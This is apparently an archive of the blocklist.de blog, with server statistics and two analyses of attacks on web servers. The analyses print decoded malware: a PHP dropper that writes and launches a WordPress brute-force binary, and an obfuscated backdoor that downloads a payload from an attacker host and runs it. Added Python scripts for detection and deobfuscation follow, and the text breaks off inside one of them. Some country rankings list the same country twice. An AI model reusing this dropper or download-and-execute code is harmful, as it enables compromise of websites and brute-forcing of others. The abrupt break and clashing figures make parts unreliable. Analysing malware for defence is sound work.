2010
04.23

The blog of www.blocklist.de is mainly used to archive statistics.

When there is something interesting, it is published here. This includes, for example, new attacks or waves of new patterns, or cases where a type of attack could be attributed to a botnet or a worm.

2016
01.03

In the last days, we have seen a lot of hacked WordPress/Joomla sites that launch outgoing brute-force login attacks against other WordPress sites.

The attackers create files named libso48.php, libso47.php, libso46.php and call them with GET requests carrying the parameters id and a:

domain.tld/directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC

The User-Agent sent by the infected hosts still contains the string "--user-agent" (apparently the curl option name leaks into the header value):

" --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"

The malicious PHP files check whether the server runs 32- or 64-bit PHP and write a matching precompiled binary from an embedded hex blob to a file named libworker (the commented-out kill line calls it libworker.so).

This libworker binary carries out the attacks.

 

Code from libso48.php (decoded):

<?php
header("Content-type: text/plain");
// polyfill for old PHP hosts without file_put_contents()
if (!function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
//@system("killall -9 ".basename("libworker.so"));
$so32 = Hex-Code; // hex-encoded 32-bit ELF binary, elided here
$so64 = Hex-Code; // hex-encoded 64-bit ELF binary, elided here
/* strings recovered from the decoded hex blob:
............
fork
INFO Started brute forcing.

path=/wp-content/pluginsINFO SUCCESS: %s
<!DOCTYPE html<ERROR> (%s:%d: errno: %s) 
can not determine logged in or not.
INFO exit status: %d
........
<ERROR> (%s:%d: errno: %s) 
Error.
<INFO> (%s:%d: errno: %s) 
Started xml rpc brute force
.........
*/
// 32- or 64-bit PHP? intval() saturates at PHP_INT_MAX, which is 2147483647 on a 32-bit build
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
print "Arch is ".$arch."\n";
$so = $arch == 32 ? $so32 : $so64;
// Copy the EI_OSABI byte (offset 7 of the ELF header, 9 = FreeBSD) from a binary that
// exists on every host into the dropped file, so that FreeBSD, whose loader checks this
// byte, accepts the binary as well. unpack("C*") returns a 1-based array, so $n[8] is byte offset 7.
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
    fclose($f);
}
// Drop the binary next to the script, make it executable and start it in the
// background with the two GET parameters; stdout/stderr go to the files out and err.
print "SO dumped ".file_put_contents("./libworker", $so)."\n";
@chmod("libworker", 0777);
//@system("./libworker " . $_GET['id'] . " > /dev/null 2> /dev/null &");
@system("./libworker " . $_GET['id'] . " " . $_GET['a'] . " > out 2> err &");
exit(0);
?>

The complete script is decoded on unphp.net (with the hex code decoded as well):
http://www.unphp.net/decode/9f6f7e9085045418857e6b54e07b20e9/

The hex code written into the libworker file contains the following strings:

......

%s
}{
  "type" : "WPBF_RESPONSE",
  "success" : false,
  "site" : "%s",
  "user" : "%s"
}
Sending: %s
{
  "type" : "WPBF_RESPONSE",
  "success" : true,
  "site" : "%s",
  "user" : "%s",
  "pass" : "%s"
}
{}curlhttp://https://%swp-login.php%s/wp-login.phphttp://%swp-login.phphttp://%s/wp-login.phplog=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1log=%s&pwd=%s&wp-submit=Log+In&redirect_to=https%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0--dataCookie:wordpress_test_cookie=WP+Cookie+check-HContent-Type:application/x-www-form-urlencodedCache-Control:max-age=0Accept-Language:en-US;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8-A-iINFO checking: %s, %s, %s
Success./src/wpbf/bf.c<ERROR> (%s:%d: errno: %s) 

As you can see, the attacker uses curl (the options --user-agent, --data, -H, -A and -i appear among the strings) and runs both XML-RPC brute force and ordinary wp-login.php WordPress brute-force logins; results are reported as JSON objects of type "WPBF_RESPONSE" with site, user and, on success, the password.

If you find a libso48.php or libworker(.so) file in your webspace, please check and clean the site, update your software and kill the running libworker processes.
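As an added example (not part of the original post), here is a small Python checker for the two indicators described above: the GET request to a libsoNN.php dropper carrying the parameters id and a, and the leaked "--user-agent=" string in the User-Agent of the outgoing brute-force requests. It also performs the ELF-header test the dropper itself relies on (bitness from e_ident[EI_CLASS], OS ABI from e_ident[EI_OSABI]), which is handy for triaging an unknown file like libworker in a document root. The log lines and the 16-byte ELF identification block are constructed for the example; hostnames, IPs and timestamps in them are invented.

```python
import re

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# GET /.../libsoNN.php?...id=...&a=... : a call to the dropper described above
DROPPER_RE = re.compile(r"/libso\d+\.php\?(?=.*\bid=)(?=.*\ba=)")
# the curl option name leaks into the User-Agent header of the brute-force requests
CURL_UA_MARK = "--user-agent="


def scan_log(text):
    """Return (ip, indicator, detail) for every log line showing one of the two signs."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if DROPPER_RE.search(m["url"]):
            hits.append((m["ip"], "dropper-call", m["url"]))
        if CURL_UA_MARK in m["ua"]:
            hits.append((m["ip"], "libworker-ua", m["ua"].strip()))
    return hits


# ELF identification bytes the dropper inspects: e_ident[EI_CLASS] and e_ident[EI_OSABI]
ELF_MAGIC = b"\x7fELF"
EI_CLASS, EI_OSABI = 4, 7
CLASSES = {1: 32, 2: 64}
OSABIS = {0: "System V (Linux)", 3: "GNU/Linux", 9: "FreeBSD"}


def classify_elf(data):
    """None if data is not an ELF file, otherwise its bitness and OS ABI.
    Any ELF binary at all inside a web document root deserves a closer look."""
    if len(data) < 16 or data[:4] != ELF_MAGIC:
        return None
    return {"bits": CLASSES.get(data[EI_CLASS]),
            "osabi": OSABIS.get(data[EI_OSABI], "other (%d)" % data[EI_OSABI])}


# Constructed sample data: three log lines modelled on the request and User-Agent quoted
# above (IPs, hosts and timestamps invented) ...
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jan/2016:10:12:01 +0100] "GET /directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/39.0"
203.0.113.9 - - [03/Jan/2016:10:12:05 +0100] "POST /wp-login.php HTTP/1.1" 200 3017 "-" " --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
198.51.100.7 - - [03/Jan/2016:10:13:00 +0100] "GET /index.php HTTP/1.1" 200 8102 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/39.0"
"""
# ... and the first 16 bytes of a 64-bit ELF whose OSABI byte was patched to 9 (FreeBSD),
# as the dropper would leave it on a FreeBSD host
SAMPLE_ELF_IDENT = ELF_MAGIC + bytes([2, 1, 1, 9]) + b"\x00" * 8

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
    print(classify_elf(SAMPLE_ELF_IDENT))
```

Run it against a real access log with `scan_log(open(path).read())`; the "libworker-ua" hits are the hosts that are already infected and attacking you, the "dropper-call" hits are requests that tried to (or did) start the binary on your own site.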

2015
03.06

The traffic, load, users and other statistics of blocklist.de for the month 02.2015

Currently, blocklist.de has the following stats/users:

Users: 2,144

Servers: 2,325

Attacks: 246,084,421 since 01.01.2014

Reports: 10,092,816 since 2012

Daily mails: ~690,500 (lower limit) to ~1,450,000 (upper limit)

Web traffic: ~309 GB

RBL/API traffic: ~85 GB

Mail (in/out) traffic: ~3,528 GB

Traffic over IPv6 (mail, web, ...): ~5 GB

On top of this comes 6.4 TB of traffic between the web/mail servers and the MySQL server. The MySQL server sends out ~8.5 GB every hour.

The MySQL server now uses 62% of its 32 GB RAM (~14 GB cache), and the system load is 1.10 on average.

The web server does not use its full 12 GB of RAM and the system load is under 0.7. There are ~25,000 open connections at the same time.

The complete traffic of all systems is roughly 6.6 TB for 02/2015 (the traffic of the MySQL server over the non-public IPs is not included).

2015
03.06

Statistics for 10/2014.

The image (up, down, same, ...) shows the change from 10/2014 (last statistics):

The arrows show the position relative to the previous month (up, down, unchanged).

Sorted by IP addresses (unique):

  1. 30324 CN
  2. 10486 RU
  3. 9775 US
  4. 9012 NoName
  5. 8925 TW
  6. 7083 UA
  7. 4876 VE
  8. 6421 VN
  9. 4980 IN
  10. 4824 AT

Sorted by number of attacks:

  1. 9278162 CN
  2. 4358200 PL
  3. 3860007 UA
  4. 2058265 NoName
  5. 596001 FR
  6. 430084 US
  7. 248110 RU
  8. 48762 DE
  9. 34456 NoASN
  10. 29661 SE
2015
03.06

After 2 years, we are trying to regenerate the country statistics from month to month again.

The image (up, down, same, ...) shows the change from 09/2014 (last statistics):

The arrows show the position relative to the previous month (up, down, unchanged).

Sorted by IP addresses (unique):

  1. 28650 CN
  2. 19957 VN
  3. 13776 RU
  4. 9309 US
  5. 7571 IN
  6. 6262 NoName
  7. 4876 VE
  8. 4743 UA
  9. 4633 TW
  10. 4054 BR

Sorted by number of attacks:

  1. 8164637 CN
  2. 4269205 PL
  3. 2593427 UA
  4. 1841862 US
  5. 906412 FR
  6. 715298 NoName
  7. 186913 RU
  8. 41671 VN
  9. 27603 NoASN
  10. 20123 IQ
2014
10.10

The traffic, load, users and other statistics of blocklist.de for the month 09.2014

Currently, blocklist.de has the following stats/users:

Users: 1,719

Servers: 1,932

Attacks: 282,138,414 since 05.05.2013

Reports: 8,572,275 since 2012

Daily mails: ~750,400 (lower limit) to ~1,250,000 (upper limit)

Web traffic: ~290 GB

RBL/API traffic: ~80 GB

Mail (in/out) traffic: ~3,315 GB

Traffic over IPv6 (mail, web, ...): ~5 GB

On top of this comes 6.1 TB of traffic between the web/mail servers and the MySQL server. The MySQL server sends out ~8.4 GB every hour.

The MySQL server now uses 60% of its 32 GB RAM (~14 GB cache), and the system load is 2.40 on average.

The web server does not use its full 12 GB of RAM and the system load is under 0.6. There are ~23,000 open connections at the same time.

The complete traffic of all systems is roughly 6.4 TB for 09/2014 (the traffic of the MySQL server over the non-public IPs is not included).

2014
10.09

After 2 years, we are trying to regenerate the country statistics from month to month again.

The image (up, down, same, ...) shows the change from 2012 (last statistics):

The arrows show the position relative to the previous month (up, down, unchanged).

Sorted by IP addresses (unique):

  1. 29182 CN
  2. 12068 VN
  3. 10280 IN
  4. 8157 US
  5. 7082 RU
  6. 14573 VN
  7. 5651 NoName
  8. 5216 VE
  9. 4054 BR
  10. 3986 UA

Sorted by number of attacks:

  1. 7805582 CN
  2. 6300587 US
  3. 1752518 US
  4. 1533083 PL
  5. 678569 NoName
  6. 537431 FR
  7. 175161 RU
  8. 35833 AT
  9. 35048 DE
  10. 32085 NoASN
2014
09.17

I have some sites with outdated software for another project.
Normally, the sites were protected with a .htaccess file. All sites were secured by quotas and other tools and also monitored (sha1 file-hash checker, process-list checker, ...).

Two sites have now been hacked, because the .htaccess was temporarily disabled and we forgot to reactivate it.

Then the following requests came in to an outdated MODx Evolution installation:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

The POST variable was:
POST['n132a88'] = "ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7";
decoded, it is only a probe that echoes a marker string, which tells the attacker that the backdoor executes what it receives:
echo "qq11oadnq98cjnwejioln23++";

Another request was:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

Another request was (note the same base64 probe, this time in the Host part of the request line):

85.143.166.103 - - [07/Aug/2014:02:53:59 +0200] "POST http://ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7/assets/cache/docid_685.pageCache.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"

POST["n0b8385"] = "JHMzOD0iV25cXGlhKm9tPX1ZVUJqd1EmZy1TTE1xXi90OlB+XHRkVFpdJzgoeGtARFwkMyMxXG4uNl9OaFIrWzl5cztDfGwhYiU1SWY0MkhPcEp1MEc8KVZgRlxye1gsRT5LXCJlY3pyIDdBdj8iOyAkR0xPQkFMU1sneHRrenA5NCddID0gJHMzOFs3MV0uJHMzOFs1MF0uJHMzOFs3MV0uJHMzOFs0OF0uJHMzOFs3M10uJHMzOFsxXS4kczM4WzRdLiRzMzhbN10uJHMzOFs4OV07ICRHTE9CQUxTWydmamlpYjUxJ10gPSAkczM4WzY2XS4kczM4WzczXS4kczM4WzFdLiRzMzhbOTBdLiRzMzhbMjVdLiRzMzhbM10uJHMzOFs2X
….
……
….
bGNyNTgnXSgkczM4LCAkczM4WzQ2XS4kczM4WzI0XS4kbnF3cnMwLCAkcHBvcWI0NykgPT0gRkFMU0UpIHsJCWlmICgkR0xPQkFMU1snandsY3I1OCddKCRzMzgsICRzMzhbMjRdLiRzMzhbMjVdLiRzMzhbN10uJHMzOFs3MV0uJHMzOFsyNF0uJG5xd3JzMCwgJHBwb3FiNDcpID09IEZBTFNFKSB7CQkJcmV0dXJuIEZBTFNFOwkJfSBlbHNlIHsJCQlyZXR1cm4gJHMzOFsyNF0uJHMzOFsyNV0uJHMzOFs3XS4kczM4WzcxXS4kczM4WzI0XS4kbnF3cnMwOwkJfQl9IGVsc2UgewkJcmV0dXJuICRzMzhbNDZdLiRzMzhbMjRdLiRucXdyczA7CX0JcmV0dXJuIEZBTFNFO30=";

Decoded, the POST variable was (every string in the payload is built by indexing into the 98-byte table $s38; the decoded values are given as comments):

$s38="Wn\\ia*om=}YUBjwQ&g-SLMq^/t:P~\tdTZ]'8(xk@D\$3#1\n.6_NhR+[9ys;C|l!b%5If42HOpJu0G<)V`F\r{X,E>K\"eczr 7Av?";
// lookup table, 98 bytes (the web rendering showed a stray space after the "<", which shifts every offset from 77 on by one and breaks the decoding)
$GLOBALS['xtkzp94'] = $s38[71].$s38[50].$s38[71].$s38[48].$s38[73].$s38[1].$s38[4].$s38[7].$s38[89]; // "php_uname"
$GLOBALS['fjiib51'] = $s38[66].$s38[73].$s38[1].$s38[90].$s38[25].$s38[3].$s38[6].$s38[1].$s38[48].$s38[89].$s38[37].$s38[3].$s38[56].$s38[25].$s38[56]; // "function_exists"
$GLOBALS['aojaf86'] = $s38[56].$s38[25].$s38[92].$s38[60].$s38[89].$s38[1]; // "strlen"

// ... truncated here, because Kaspersky says it is a virus ... aaaaaahhhhhhhh

=$s38[50].$s38[25].$s38[25].$s38[71].$s38[26].$s38[24].$s38[24].$s38[1].$s38[6].$s38[25].$s38[89].$s38[56].$s38[46].$s38[4].$s38[92].$s38[25].$s38[18].$s38[71].$s38[4].$s38[92].$s38[25].$s38[1].$s38[89].$s38[92].$s38[92].$s38[46].$s38[1].$s38[89].$s38[25].$s38[24].$s38[56].$s38[7].$s38[47].$s38[67]; // fragment (variable name lost in the truncation); decodes to hxxp://notes[.]art-partnerr[.]net/sm64, the download URL of the 64-bit payload
$zxozz28 = $s38[83].$s38[40].$s38[78].$s38[19].$s38[49].$s38[48].$s38[19].$s38[85].$s38[19].$s38[19].$s38[65].$s38[70].$s38[49].$s38[48].$s38[58].$s38[70].$s38[70].$s38[87].$s38[65].$s38[85].$s38[8].$s38[27].$s38[1].$s38[72].$s38[37].$s38[27].$s38[40].$s38[21].$s38[55].$s38[27].$s38[3].$s38[44].$s38[55].$s38[90].$s38[31].$s38[14].$s38[52].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[75].$s38[37].$s38[73].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[13].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[40].$s38[64].$s38[42].$s38[90].$s38[69].$s38[65].$s38[35].$s38[70].$s38[13].$s38[65].$s38[91].$s38[49].$s38[31].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[55].$s38[27].$s38[40].$s38[64].$s38[73].$s38[30].$s38[13].$s38[14].$s38[42].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[68].$s38[27].$s38[40].$s38[64].$s38[73].$s38[10].$s38[31].$s38[14].$s38[91].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[50].$s38[27].$s38[40].$s38[64].$s38[17].$s38[90].$s38[31].$s38[14].$s38[14].$s38[21].$s38[13].$s38[67].$s38[25].$s38[10].$s38[69].$s38[85].$s38[35].$s38[27].$s38[7].$s38[64].$s38[42].$s38[27].$s38[75].$s38[71].$s38[68].$s38[30].$s38[1].$s38[65].$s38[67].$s38[20].$s38[19].$s38[44].$s38[13].$s38[10].$s38[0].$s38[80].$s38[37].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[74].$s38[52].$s38[20].$s38[0].$s38[64].$s38[42].$s38[27].$s38[40].$s38[64].$s38[17].$s38[30].$s38[91].$s38[37].$s38[22].$s38[30].$s38[1].$s38[32].$s38[55].$s38[70].$s38[58].$s38[74].$s38[25].$s38[10].$s38[75].$s38[49].$s38[68].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[44].$s38[13].$s38[10].$s38[91].$s38[95].$s38[56].$s38[90].$s38[7].$s38[71].$s38[55].$s38[27].$s38[3].$s38[44].$s38[17].$s38[30].$s38[91].$s38[14].$s38[52].$s38[90].$s38[83].$s38[90].$s38[35].$s38[4].$s38[1].$s38[32].$s38[68].$s38[90].$s38[13].$s38[17].$s38[25].$s38[20].$s38[83].$s38[80].$s38[68].$s38[10].$s38[42].$s38[32].$s38[37].$s38[20].$s38[69].$s38[49].$s38[42].$s38[32].$s38[42].$s38[12].$s38[94].$s38[20].$s38[42].$s38[72].$s38[13].$s38[90].$s38[69].$s38[10].$s38[56].$s38[10].$s38[0].$s38[44].$s38[96].$s38[20].$s38[0].$s38[78].$s38[6].$s38[49].$s38[19].$s38[37].$s38[55].$s38[4].$s38[1].$s38[65].$s38[52].$s38[20].$s38[83].$s38[80].$s38[42].$s38[27].$s38[40].$s38[64].$s38[73].$s38[32].$s38[7].$s38[95].$s38[35].$s38[4].$s38[69].$s38[6].$s38[55].$s38[21].$s38[13].$s38[95].$s38[52].$s38[20].$s38[0].$s38[64].$s38[7].$s38[10].$s38[40].$s38[14].$s38[8]; // long literal starting with "..._SESSION_COOKIE=" followed by a base64-looking blob; not referenced in the visible part
$ntgai94 = $GLOBALS['xtkzp94']($s38[56]); // php_uname('s'): OS name
$igekj52 = $GLOBALS['xtkzp94']($s38[7]); // php_uname('m'): machine type
echo $s38[76].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86]; // "<shchzzz>", opening marker for the operator's response parser
for (;;)
{
if (!$GLOBALS['fjiib51']($s38[56].$s38[50].$s38[89].$s38[60].$s38[60].$s38[48].$s38[89].$s38[37].$s38[89].$s38[90])) // function_exists('shell_exec')
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[44].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[56].$s38[50].$s38[89].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[86]; // "<err step=1 err=noshex data=>"
break;
}
if ($ntgai94 !== $s38[20].$s38[3].$s38[1].$s38[73].$s38[37]) // 'Linux'
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[68].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[60].$s38[3].$s38[1].$s38[73].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$mqcjh70.$s38[86]; // "<err step=2 err=nolinux data=".$mqcjh70.">"
break;
}
$nneyn30 = $s38[71].$s38[56]; // "ps": the dropped file is named after a system tool
$cttgs64 = "";
if ($GLOBALS['aojaf86']($GLOBALS['dfyoo42'](~0)) == 64) // strlen(...(~0)) == 64: 64-bit check; dfyoo42 is presumably decbin
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[47].$s38[67].$s38[86]; // "<inf step=3 data=x64>"
$cttgs64 = $rmznz0; // download URL of the 64-bit payload
}
else
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[42].$s38[68].$s38[86]; // "<inf step=3 data=x32>"
$cttgs64 = $dfdjy19; // download URL of the 32-bit payload
}
$pjimj72 = "";
if (!$GLOBALS['gwigy41']($nneyn30)) // presumably file_exists('ps')
{
$pjimj72 = $GLOBALS['vziql67']($s38, $cttgs64, $nneyn30); // download to ./ps, falling back to /tmp/ps (see gbzrm90 below); returns the path
if ( $pjimj72 == FALSE)
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[67].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[30].$s38[6].$s38[14].$s38[1].$s38[60].$s38[93].$s3... // "<err step=4 err=downl..." ... truncated here, because Kaspersky says it is a virus .... aaaaaahhhhhhhh
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[64].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[30].$s38[6].$s38[1].$s38[89].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[68].$s38[8].$cgthg36.$s38[86]; // "<inf step=5 data=done data2=".$cgthg36.">"
$GLOBALS['tkjre65'](1);
$GLOBALS['jtjiv94']($pjimj72); // runs the downloaded file
break;
}
echo $s38[76].$s38[24].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86]; // "</shchzzz>", closing marker

// Helper 1: fetch a URL, with fopen() first and curl as fallback. The aliases that are not
// built from $s38 in the visible part (fjcva91, dmrqg14, npbou10, hjiar61, ekyyn43,
// mashg65, udsvx59, naftp70) are identified from their arguments.
function fildv12($s38, $htxbt38)
{
$ppoqb47 = "";
$ogrpt28 = @$GLOBALS['fjcva91']($htxbt38, $s38[92].$s38[62]); // fopen($url, "rb")
if ($ogrpt28 == FALSE)
{
if (!$GLOBALS['fjiib51']($s38[90].$s38[73].$s38[92].$s38[60].$s38[48].$s38[3].$s38[1].$s38[3].$s38[25])) // function_exists('curl_init')
return FALSE;
$henof76 = @$GLOBALS['dmrqg14'](); // curl_init()
@$GLOBALS['npbou10']($henof76, CURLOPT_URL, $htxbt38); // curl_setopt()
@$GLOBALS['npbou10']($henof76, CURLOPT_RETURNTRANSFER, true);
$ppoqb47 = @$GLOBALS['hjiar61']($henof76); // curl_exec()
@$GLOBALS['ekyyn43']($henof76); // curl_close()
}
else
{
while(!$GLOBALS['mashg65']($ogrpt28)) // feof()
$ppoqb47.=$GLOBALS['udsvx59']($ogrpt28, 1024 * 64 ); // fread() in 64 KB chunks
$GLOBALS['naftp70']($ogrpt28); // fclose()
}
return $ppoqb47;
}

// Helper 2: write the downloaded data to a path, with fopen()/fwrite() first and
// file_put_contents() as fallback; verifies that the whole payload was written.
function eghou87($s38, $yaxje72, $ppoqb47)
{
$negtx78 = $GLOBALS['fjcva91']($yaxje72, $s38[14].$s38[62].$s38[52]); // fopen($path, "wb+")
if ($negtx78 == FALSE)
{
if (!$GLOBALS['fjiib51']($s38[66].$s38[3].$s38[60].$s38[89].$s38[48].$s38[71].$s38[73].$s38[25].$s38[48].$s38[90].$s38[6].$s38[1].$s38[25].$s38[89].$s38[1].$s38[25].$s38[56])) // function_exists('file_put_contents')
return FALSE;
if ( @$GLOBALS['wtxbv81']($yaxje72, $ppoqb47) === FALSE ) // file_put_contents()
return FALSE;
}
else
{
$jznmi77 = $GLOBALS['acklf72']($negtx78, $ppoqb47, $GLOBALS['aojaf86']($ppoqb47)); // fwrite($fh, $data, strlen($data))
$GLOBALS['naftp70']($negtx78); // fclose()
if ($jznmi77 == FALSE || $jznmi77 != $GLOBALS['aojaf86']($ppoqb47)) // strlen()
return FALSE;
}
return TRUE;
}

// Helper 3: download (adwwg63 = helper 1) and store (jwlcr58 = helper 2) the payload,
// first as ./<name> in the script directory, then as /tmp/<name>; returns the path used.
function gbzrm90($s38, $htxbt38, $nqwrs0)
{
$ppoqb47 = $GLOBALS['adwwg63']($s38, $htxbt38);
if ($ppoqb47 == FALSE)
return FALSE;
if ($GLOBALS['jwlcr58']($s38, $s38[46].$s38[24].$nqwrs0, $ppoqb47) == FALSE) // "./".$nqwrs0
{
if ($GLOBALS['jwlcr58']($s38, $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0, $ppoqb47) == FALSE) // "/tmp/".$nqwrs0
{
return FALSE;
}
else
{
return $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0; // "/tmp/".$nqwrs0
}
}
else
{
return $s38[46].$s38[24].$nqwrs0; // "./".$nqwrs0
}
return FALSE;
}

A short look shows that the code checks the system with php_uname and downloads an xxxx64/xxxx32 file (in the visible part it is stored as "ps" in the script directory or in /tmp and then executed), which was analysed by our friends from MalwareMustDie at:
http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
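As an added example (not code from this post or from the malware), the following Python script resolves the $s38[...] index obfuscation shown above: it inlines every run of indexed characters as a PHP string literal and then rewrites $GLOBALS['alias'](...) calls through the alias table that first step exposes, so the payload reads as plain PHP. The lookup string is the one from the decoded payload, with the stray space after the "<" removed (with it, every offset from 77 on is off by one and nothing decodes); the sample lines are copied from the listing above.

```python
import re

# Lookup table from the decoded payload. The blog's rendering shows a stray space after
# the "<" (index 76); it is dropped here, otherwise every offset from 77 on is shifted by one.
KEY = ("Wn\\ia*om=}YUBjwQ&g-SLMq^/t:P~\tdTZ]'8(xk@D$3#1\n.6_NhR+[9ys;C|l!b%5If42HOpJu0G<)V`F\r"
       "{X,E>K\"eczr 7Av?")
assert len(KEY) == 98

RUN = re.compile(r"\$s38\[\d+\](?:\s*\.\s*\$s38\[\d+\])*")   # $s38[a].$s38[b]....
INDEX = re.compile(r"\[(\d+)\]")
ASSIGN = re.compile(r"\$GLOBALS\['(\w+)'\]\s*=\s*'((?:[^'\\]|\\.)*)';")  # $GLOBALS['alias'] = 'literal';


def php_quote(s):
    """Render a decoded string as a single-quoted PHP literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def decode_run(run):
    """'$s38[71].$s38[50]....' -> the characters those indices select from KEY."""
    return "".join(KEY[int(i)] for i in INDEX.findall(run))


def resolve_runs(src):
    """Pass 1: replace every index run by the string it builds."""
    src = re.sub("[\u201a\u2018\u2019\u2032]", "'", src)   # typographic quotes from the web rendering
    src = re.sub("[\u201e\u201c\u201d]", '"', src)
    return RUN.sub(lambda m: php_quote(decode_run(m.group(0))), src)


def deobfuscate(src):
    """Pass 2: once the alias table is readable, rewrite $GLOBALS['alias'](...) call
    sites to the real function name."""
    text = resolve_runs(src)
    for alias, literal in ASSIGN.findall(text):
        call = re.compile(re.escape("$GLOBALS['%s']" % alias) + r"\s*\(")
        text = call.sub(lambda m, name=literal: name + "(", text)
    return text


# Sample input: lines copied from the decoded POST payload above.
SAMPLE = r"""
$GLOBALS['xtkzp94'] = $s38[71].$s38[50].$s38[71].$s38[48].$s38[73].$s38[1].$s38[4].$s38[7].$s38[89];
$GLOBALS['fjiib51'] = $s38[66].$s38[73].$s38[1].$s38[90].$s38[25].$s38[3].$s38[6].$s38[1].$s38[48].$s38[89].$s38[37].$s38[3].$s38[56].$s38[25].$s38[56];
$GLOBALS['aojaf86'] = $s38[56].$s38[25].$s38[92].$s38[60].$s38[89].$s38[1];
$ntgai94 = $GLOBALS['xtkzp94']($s38[56]);
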